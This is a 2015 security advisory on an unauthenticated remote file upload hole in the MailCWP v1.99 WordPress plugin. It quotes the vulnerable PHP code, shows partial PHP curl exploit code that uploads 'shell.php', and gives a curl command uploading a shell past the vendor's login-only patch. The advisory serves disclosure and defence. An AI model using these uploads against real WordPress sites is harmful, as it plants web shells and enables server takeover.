| Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin |
| Author: Larry W. Cashdollar, @_larry0 |
| Date: 2015-07-09 |
| CVE IDs:[CVE-2015-1000000] |
| Download Site: https://wordpress.org/plugins/mailcwp/ |
| Vendor: |
| Vendor Notified: 2015-07-09 |
| Vendor Contact: Contact Page via WP site |
| Advisory: http://www.vapidlabs.com/advisory.php?v=138 |
| Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website. |
| Vulnerability: The code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server:
2 $message_id = $_REQUEST["message_id"];
3 $upload_dir = $_REQUEST["upload_dir"];
.
.
8 $fileName = $_FILES["file"]["name"];
9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");
Exploitation requires the attacker to guess a writeable location in the http server root. |
| Export: JSON TEXT XML |
| Exploit Code: 'shell.php','file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo " "; echo $result; echo " "; ?> |
| Screen Shots: |
| Notes: The vendor patch for this vulnerability only requires that the user have a login on the wordpress site before exploiting this vulnerability. curl -F "file=@/tmp/shell.pht" "http://example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1" -F "upload_dir=/usr/share/wordpress/wp-content/uploads" --cookie cookie.txt |